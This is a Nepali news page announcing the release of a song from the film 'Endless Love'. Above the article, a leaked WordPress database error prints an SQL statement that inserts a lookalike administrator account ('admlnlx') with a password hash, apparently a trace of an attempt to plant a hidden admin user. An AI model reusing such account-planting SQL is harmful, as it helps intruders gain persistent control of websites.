WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B/Rs2i1bndUPY0bETuahvEnFgGQLyt/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-03 12:11:00', '', 'admlnlx', 'admlnlx')
काठमाडौं,फागनु १ –
चलचित्र ‘इन्डलेस लभ’ को गीत सार्वजनिक गरिएको छ ।
भ्यालेन्टाइन डे को छेको पारेर गीत सार्वजनिक गरिएको हो । गीतको लिरिकल भिडियोसमेत तयार पारेर युट्युबमा अपलोड गरिएको छ ।
अल्मोडा राना उप्रेती र सुमन गुरुङको स्वर रहेको गीतमा जयन्त शर्माको शब्द तथा संगीत छ ।
शिवराज ढकालको निर्माण चलचित्र ‘इन्डलेस लभ’ लाई साजन श्रेष्ठले निर्देशन गरेका हुन् ।
https://www.youtube.com/watch?v=EDkFELQnIeo